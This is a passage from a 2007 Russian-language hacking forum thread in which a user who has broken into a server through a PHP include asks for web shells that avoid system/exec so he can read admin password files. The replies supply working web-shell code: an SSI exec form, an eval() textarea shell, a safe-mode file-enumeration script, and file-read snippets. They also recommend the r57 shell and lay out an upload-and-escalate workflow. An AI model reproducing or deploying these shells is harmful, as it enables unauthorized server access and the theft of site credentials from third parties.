Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Нужен веб-шелл без использования system, passthru,exec,etc (https://forum.antichat.xyz/showthread.php?t=39234)

fastnull 30.04.2007 17:19
Нужен веб-шелл без использования system, passthru,exec,etc
 
Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а
Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!

fly 30.04.2007 17:30
CODE
<html>
<body>
<script language="JavаScript">
<!--
function execute() {
var cmd = document.exec.cmd.value;
document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
}
//-->
</script>
<form name="exec">
<input type="text" name="cmd" size="20" value="">&nbsp;
<input type="submit" value="exec" onClick="execute()">
</form>
</body>
</html>

fly 30.04.2007 17:32
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>

fastnull 30.04.2007 17:47
Цитата:
Сообщение от fly
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>
Спасибо! Приму к сведению! А есть ещё что-нибудь навороченное, с алиасами и всё-такое?

fly 30.04.2007 20:52
Есть , но стоит денег! Поставь хоть +! :)

Потыкай вот это еще

Код:
<?
"; echo ""; echo "
Root directory:
"; echo ""; echo "
------------------------------------
"; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i ";
  foreach($D as $item) echo "{$item}\n";
  echo "
"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>

fastnull 01.05.2007 06:27
Цитата:
Сообщение от fly
Есть , но стоит денег! Поставь хоть +! :)
Потыкай вот это еще
Дай бог тебе здоровья, парень!

fastnull 01.05.2007 06:35
Цитата:
Сообщение от fly
Поставь хоть +! :)
Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень! ;)

SkyMan 01.05.2007 15:54
PHP код:
<?php
    $gpc=get_magic_quotes_gpc();
    if (!empty($_POST['c'])) {
        $c $gpc?stripslashes($_POST['c']):$_POST['c'];
    } else {
        $c NULL;
    }
?>
<form action="" method="POST">
<textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea>
<br />
<input type="submit"/>
</form>
<?php
 if (!is_null($c)) eval($c);
?>
=========
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться.
===========
Вот код для просмотра текущей директории:
PHP код:
 $d dir(".");
 echo "Дескриптор: ".$d->handle."<br>\n";
 echo "Путь: ".$d->path."<br>\n";
 while (false !== ($entry $d->read())) {
    echo $entry."<br>\n";
 }
 $d->close(); 
=============
А вот для файла:
PHP код:
 echo '<xmp>';
 htmlspecialchars(readfile('file.php'));
 echo '</xmp>'
-------------------------------------
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
=================
Есть еще шелл, не использующий system:
http://php.spb.ru/remview/

fly 01.05.2007 19:30
В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.

fly 01.05.2007 19:32
Береги себя!!! Стучи 1-869-53два!


Время: 06:44
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице